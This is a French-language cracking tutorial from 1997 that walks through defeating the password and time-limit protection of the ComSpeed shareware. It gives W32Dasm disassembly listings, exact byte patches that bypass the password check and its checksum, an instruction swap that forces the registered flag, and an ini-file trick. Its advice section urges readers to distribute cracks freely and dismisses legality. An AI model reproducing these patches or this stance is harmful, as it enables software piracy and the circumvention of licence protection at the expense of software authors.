Il a deux types de protections (en fait il en a 3 mais nous verrons cela plus loin..:-):
-Il est limité dans le temps à 120 jours d'utilisation.
-Il est protégé par un mot de passe qui permet son débridage.
 
 

Il existe 2 méthodes pour craquer un programme:
1/ -"Live Approach".
2/ -"Dead Listing".
 

1/ "Live Approach" consiste à deboguer le programme (l'exécuter pas à pas) avec un debugger
(comment ne pas nommer ici SoftIce 3.01) en posant des Breakpoints et en le traçant.
Cette méthode est tout particulièrement adaptée aux programmes nécessitants un mot
de passe (comme ComSpeed) ou ayant un "NagScreen".

2/ "Dead Listing" consiste a désassembler le programme et a chercher dans le listing
le schéma de protection pour le modifier à son gré. Cette méthode est assez formidable
pour peu que vous connaissiez un peu l'Assembleur. Vous pourrez modifier le programme,
lui faire faire ce que VOUS voulez! Cette méthode s'applique très bien aux programmes
nécessitants un mot de passe mais aussi et surtout aux "Démos" bridées qui ne vous
permettent pas de sauvegarder un fichier, de l'imprimer, ou bien limitées dans le temps
ou avec un "nagscreen"...
Cette méthode peut paraitre assez effrayante aux yeux des débutants en raison de la taille
importante du listing obtenu de certains programmes Windows (désassembler la démo de Quark
XPress donne un fichier de plus de 50 Mo que même Word6 n'arrivera pas a ouvrir:-).
Cependant, les schémas de protections sont souvent situés dans une toute petite zone
du programme presque toujours facilement localisable et n'en sortent que très rarement
en raison de la limitation des registres du CPU.

Bien sur, pour de meilleurs résultats, la combinaison de ces deux méthodes ne peut etre
que bénéfique.
 

Comme ComSpeed ne fait que 53 Ko, nous utiliserons le "Dead Listing". De plus, il n'existe
pratiquement pas de cours en Français sur cette technique.
 

Nous avons besoin pour ce crack de W32Dasm6 (ou W32Dasm85).
 
 
 
 
 
 
 

--------------------------------------------------------------------------------
N'utilisez PAS W32Dasm7 ou W32Dasm8!!!!

J'utilise ici W32Dasm6 parce que suivant le programme que vous avez a désassembler (16bits
ou 32bits...), si vous utilisez differentes versions de W32Dasm vous n'obtiendrez JAMAIS
le même résultat.
Si vous désassemblez ComSpeed avec W32Dasm6 vous obtiendrez beaucoup de 'String Datas
References'(cf ci-dessous), tandis que vous n'en n'obtiendrez AUCUNES avec W32Dasm7 ou 8.

De plus W32Dasm n'est pas un très bon désassembleur et même son schéma de protection est
ridicule. Je vous expliquerai très prochainement comment le craquer.
--------------------------------------------------------------------------------
Bon assez de bla-bla, place au boulot:
 

2/ EXECUTION DU CRACK
 

Lancez W32Dasm6 et ouvrez CompSpeed.

Nous allons rechercher le maximum d'infos. Ce sont essentiellements des chaines de
caractères (les 'String Datas References' dont je vous parlait ci-dessus) contenants
les mots du genre "Enter Your PassWord", "Wrong Password", "PassWord IS correct", "You are
using this program for xxxx days"....Trouver ces mots est avant tout l'essence même du
'Dead Listing'.

Appuyez dans la barre à outils sur le boutton 'string Datas References'.
On trouve, entre autres, dans la liste qui s'affiche:

 CodeFalse_
 CodeOk_

N'est-ce pas déjà merveilleux!
On a presque tout ici, la routine qui s'execute quand le mot de passe est correct (CodeOK_)
et celle du mauvais mot de passe.
 

Plus bas dans la liste on trouve aussi:

 VIRUS_

(ça, nous verrons plus loin...:-).

On a assez d'informations pour commencer le crack.
 
 

Cliquez sur 'CodeOK_' et W32Dasm vous envoie directement à cette routine qui commence à
l'adresse 0011.0271. Juste après, on trouve la procédure CodeFalse_ en 0011.02A4.

Jettons un oeil sur "CodeOk_":

:0011.0262 9AFFFF0000             call 0012.02E5h
:0011.0267 08C0                   or al , al
:0011.0269 7433                   je 029E                 ;< Excellent
:0011.026B FF76F0                 push word ptr [bp+F0]
:0011.026E FF76EE                 push word ptr [bp+EE]

* Possible StringData Ref from Data Seg 017 ->"CODEOK_%s" ;< **ICI**
:0011.0271 BFF104                 mov di, 04F1
:0011.0274 1E                     push ds

On trouve un joli saut conditionnel (je 029E) qui nous enverra sur la procedure "CodeFALSE_"
si le mot de passe est incorrect.

On le change:

:0011.0269 7533                   jne 029E

Maintenant le programme ira sur "CodeOK_" quand le mot de passe sera faux.

Lancez ComSpeed après cette modification faite avec un éditeur hexadécimal:
Le programme refuse de démarrer et vous dit:
"The .exe file has been modified! That can be a Virus...".

Vous vous souvenez de "VIRUS_" que nous avions trouvé dans la liste des 'String References
Datas'??
C'est un CheckSum. Le programme additionne les bytes et vérifie le résultat.
Facile a contourner:

Nous avons changé un 74 (je) par un 75 (jne) donc nous allons modifier le 33 qui le suit:

Nous avions:
:0011.0269 7533

On le change avec:
:0011.0269 7532

Au départ nous avions 74+33 et maintenant 75+32: ça donne le même résultat. On se fiche pas
mal de modifier l'adresse du saut puis le programme n'exécutera jamais ce saut (sauf si
vous entrez le bon mot de passe)

Après, on relance ComSpeed: Ca marche.

Essayez de vous enregistrer (Shareware/Enter Code...). Entrez votre nom et n'importe quel
mot de passe puis appuyez sur OK. Là encore, ça marche.
Maintenant quittez ComSpeed puis relancez-le: Il n'est plus enregistré.

En fait nous ne nous sommes débarassé que de la procédure de vérification du mot de passe
entré au clavier. Le progamme vérifie au démarrage le mot de passe (qu'il lit dans
ComSpeed.ini) avec le bon mot de passe.

Etait-ce donc nécessaire de craquer cette partie? Non, mais ça ne nous a pris que 5mn et
maintenant si vous ouvrez ComSpeed.ini, vous saurez de qu'elle manière le programme y
inscrit votre nom et mot de passe:

 SwName=_Votre_Nom
 SwCode=_Votre_Mot_De_Passe
 

Bon, maintenant c'est le moment de faire marcher sa cervelle.

On étant ses pieds sous le bureau, on remonte les manches, on s'allume une cigarette....et
on se concentre:

Regardez le menu de ComSpeed.
Il y a:

 File / Com-Port() / Shareware / Help.

Vous avez peut-etre remarqué (n'est-ce pas?) que quand vous vous êtez enregistré il y a
quelques minutes celui-ci s'est tranformé en:

 File / Com-Port() / Help.

Et oui, 'Shareware' disparait de la barre des menus quand le programme est enregistré.
Execellent!

On retourne dans W32Dasm6:

Appuyez dans la barre à outils sur le boutton 'Imports Functions'.
Une liste de toutes les fonctions de Windows (les API) qui sont utilisées par ComSpeed
s'y trouve. Elles permettent, entre autre, a un programme d'utiliser une interface
graphique 100% Windows...

Pour créer une Barre des Menus, un programme Windows doit appeller la fonction
USER!DrawMenuBar. Cliquez sur elle (dans la liste) plusieurs fois pour localiser tous
les appels à celle-ci dans ComSpeed.
On ne trouve que deux appels.

Le deuxième est tout a fait intéressant:

:0001.1756 9AFFFF0000     call 0011.0122h
:0001.175B 803ED00400     cmp byte ptr [04D0], 00 ; < 04D0=0??
:0001.1760 7531           jne 1793                ; < Si <>0 alors 'Unregistered'
:0001.1762 FF363C0A       push word ptr [0A3C]
:0001.1766 FF363A0A       push word ptr [0A3A]
:0001.176A 9AFFFF0000     call 0006.0044h
:0001.176F FF363407       push word ptr [0734]
:0001.1773 6A02           push 0002
:0001.1775 680004         push 0400
:0001.1778 9AFFFF0000     call USER.DELETEMENU    ; < Efface Menu car 'Registered'
:0001.177D FF760E         push word ptr [bp+0E]
:0001.1780 9AFFFF0000     call USER.DRAWMENUBAR   ; < **ICI**
:0001.1785 FF760E         push word ptr [bp+0E]
:0001.1788 6A00           push 0000

On voit que USER!DeleteMenu va effacer la barre des menus et tout de suite derrière,
DrawMenuBar va en créér une autre toute jolie sans le mot 'Shareware'.
Au dessus, on trouve encore un saut conditionel (Jne 1793) qui, si 04D0 est différent de 0
nous fera sauter par dessus ces deux fonctions.
On en déduit tout simplement que si 'byte ptr [04D0] = 0' alors le programme est
'Registered'.

Si vous cherchez 'cmp byte ptr [04D0], 00' dans le listing de ComSpeed, vous le trouverez
10 fois.

Maintenant, on va chercher l'instruction qui va écrire à l'adresse 04D0:

Cherchez: 04D0

On en trouve une seule:

:0011.0D27 9AFFFF0000    call 0012.02E5h
:0011.0D2C 08C0          or al , al
:0011.0D2E B000          mov al, 00                 ; al:=0
:0011.0D30 7501          jne 0D33                   ; Rien à cirer
:0011.0D32 40            inc ax                     ; al:=al+1
:0011.0D33 A2D004        mov [04D0], al             ; **ICI** 04D0=al
:0011.0D36 803ED00400    cmp byte ptr [04D0], 00    ; Encore!
:0011.0D3B 7527          jne 0D64                   ; Si 04D0<>0 =>Unregistered
:0011.0D3D FF36D404      push word ptr [04D4]
:0011.0D41 FF36D204      push word ptr [04D2]

Et voila M'sieurs Dames.

Devons nous changer le 'jne 0D64' avec un 'je 0D64'? Non. N'oubliez pas le checksum et
le fait que vous devriez changer les 10 sauts conditionels suivants les 10 'cmp byte
ptr [04D0], 00'.

Pour ce type de crack j'utilise toujours le même vieux truc:
Etant donné qu'on ne peut pas modifier trop de bytes en raison du checksum, rien
(mais alors vraiment rien) ne nous empêche d'intervertir les intructions.
 

Exemple:

Nous avions:

:0011.0D2E B000          mov al, 00
:0011.0D30 7501          jne 0D33
:0011.0D32 40            inc ax

:0011.0D33 A2D004        mov [04D0], al
:0011.0D36 803ED00400    cmp byte ptr [04D0], 00
:0011.0D3B 7527          jne 0D64

Peut être changé en:

:0011.0D2E 7501          jne 0D31                ; Toujours rien à cirer
:0011.0D30 40            inc ax                  ; al:=al+1
:0011.0D31 B000          mov al, 00              ; al:=0    < Voila!

:0011.0D33 A2D004        mov [04D0], al
:0011.0D36 803ED00400    cmp byte ptr [04D0], 00
:0011.0D3B 7527          jne 0D64

Maintenant "al:=0" et l'instruction "mov [04D0], al" donnera la valeur 0 (donc 'Registered')
dans "04D0".
ComSpeed ne s'appercevra jamais de ces modifications et le résultat de "cmp byte
ptr [04D0], 00"  sera toujours VRAI et ceci tout au long du programme.

ComSpeed est maintenant enregistré.
 
 
 

3/ CONSEILS
 

Que choisir : Live Approach ou Dead Listing??

Personne ne pourra vous répondre....
Effectivement, chaque Cracker a ses préférences.
Moi, je commence toujours avec SoftIce (v3.01) histoire de savoir ce que fait le programme,
ses differents appels aux API...bref juste pour savoir a qui j'ai a faire.
Je verifie aussi qu'il n'est pas écrit (mal-écrit) en Visual Basic (tout bon programmeur
n'écrit JAMAIS en Visual Basic) puis je le désassemble car cette technique est la plus cool
et la plus zen des deux (passer des heures devant l'écran de SoftIce peut se révéler assez
pénible tandis que désassembler un fichier puis imprimer les parties de code intéressantes
pour aller les étudier (et les craquer) à la terrasse d'un café sur les Quais de la Mégisserie
en buvant une Leffe fait partie des ces habitudes qui rendent la vie du cracker tellement
plus agréable...:-).
Chacun ses gouts.
De toute façon, l'idéal est de combiner ces deux techniques pour pouvoir TOUT craquer.

Attention: Certains programmes (de plus en plus) détectent si SoftIce est chargé et
risquent de vous planter ou rebooter. Mais d'autres (ou les mêmes une fois qu'ils se seront
débarasser de SoftIce) vous planteront si tentez vous les désassembler.
C'est le cas de SmartDraw v3.11 Win95. Si vous essayez de craquer ce programme en le traçant
avec SoftIce vous avez de grandes chances pour qu'il vous plante et soyez obligé de rebooter.
De plus il est impossible de le désassembler (toutes versions de W32Dasm confondues).
En fait, les auteurs de tels logiciels n'écrivent pas cette protection mais font appel à des
programmes de protection très couteux (EverLock, Copy Control) qu'ils intègrent à leurs
softs.
C'est généralement suffisant pour faire abandonner les petits crackers. Mais ne vous
dégonflez pas:
Vous n'avez pas besoin de SoftIce ou W32Dasm pour craquer SmartDraw. Avec un simple éditeur
hexadécimal (comme HexWorkShop) il ne vous faudra pas plus de 5mn pour le craquer à 90%.
Mais cela sera pour plus tard...ne grillez pas les étapes. Prennez et craquez des logiciels
de votre niveau (comme ComSpeed) pour l'instant.
 

Dès que vous aurez craqué votre programme, executez le avec SoftIce de nombreuses fois pour
être sûr de n'avoir rien oublié (en craquant à un endroit on peut déclencher ulterieurement
une autre protection "cachée"...) bref VERIFIEZ que votre crack est totalement FIABLE.
 

Dès que votre crack est bon, DISTRIBUEZ-LE (gratuitement evidemment) a tous ceux qui ne
peuvent pas s'acheter le programme enregitré et aussi aux crétins qui ne seraient même pas
capables de réaliser 1/10e de votre crack. Et surtout EVITEZ les trucs du genre:
-"Je vous passe ce crack mais vous n'avez pas le droit de vous en servir, c'est illégal".
ou bien:
-"Moi je crack des programmes? Oui bien sûr, mais quand je les utilises longtemps
  je m'enregistre auprès de leurs auteurs".

CA VA PAS, NON??!!!

On est des CRACKERS, des VRAIS, des DURS, des PURS.
Qui vous a parlé de "légalité"? Pourquoi faire confiance à un crétin de programmeur alors
qu'il n'a même pas été capable d'écrire un bon schéma de protection puisque vous l'aurez
craqué en 5mn? Vous acheteriez un programme à un type comme ça vous? Moi non.
 
 

4/ LIVRES
 

Vous trouverez de très nombreux ouvrages sur l'informatique et le PC mais peu sont réellement
adaptés à nos besoins. En voici donc 2 particulièrement indispensables et faciles a trouver:

-Assembleur:

"Assembleur Pratique" - de Bernard Fabrot chez Marabout  Collection "Best-Sellers de
l'informatique" 1996.

Pour un prix modeste de 50 balles et un format livre de poche, c'est a mon avis ce qui ce fait
de mieux pour apprendre ce merveilleux langage. Destiné au mode 32 bits, cette mise à jour
succède à "Assembleur facile" ( de P.Mercier qui avait écrit de très bons ouvrages sur le BIOS
et la programmation DOS:=) qui lui ne concernait que le 16 bits. Ils ont bien fait de
changer le titre pour cette nouvelle version! N'essayez pas de l'apprendre par coeur, vous
n'y arriverez pas. Contentez-vous de l'avoir sous la main à chaque fois que vous rencontrerez
un instruction que vous ne connaissez pas, et ça finira bien par rentrer...

-API:

"Programmation des API -Windows 95 Win32" de Richard Simon chez Simon & Schuster Macmillan
France - coll. "Secrets d'experts" (+ CD-ROM).

Là, il vous faudra dépenser 399FF (je vous ai déjà fait économiser $11 en vous apprenant a
craquer ComSpeed!! :=) mais il vaut bien son prix car je n'en n'ai jamais trouver d'autres
aussi complets. Tout y est classé par catégorie (E/S, Menus, Boites de dialogue, registre...)
et très bien détaillé. De nombreux exemples sur le CD-ROM avec leur source. Très bien.
 
 
 
 
 
 
 

Voila, d'autres cours suivronts ...
 

Frog's Print -06/97

(http://www.ThePentagon.com/frog_s_print)

PS: J'allais oublier, ouvrez le fichier ComSpeed.ini et a coté des lignes suivantes
rajoutez votre nom:
 SwName=Mettez_Votre_Nom
 SwCode=Merci_Frog's_Print
Lancez ensuite ComSpeed et appuyez sur 'Help' - 'About' et le tour est joué...
 

Voilà cet E-mag est fini! Vous pouvez m'écrire à: clad_strife@hotmail.com

Clad Strife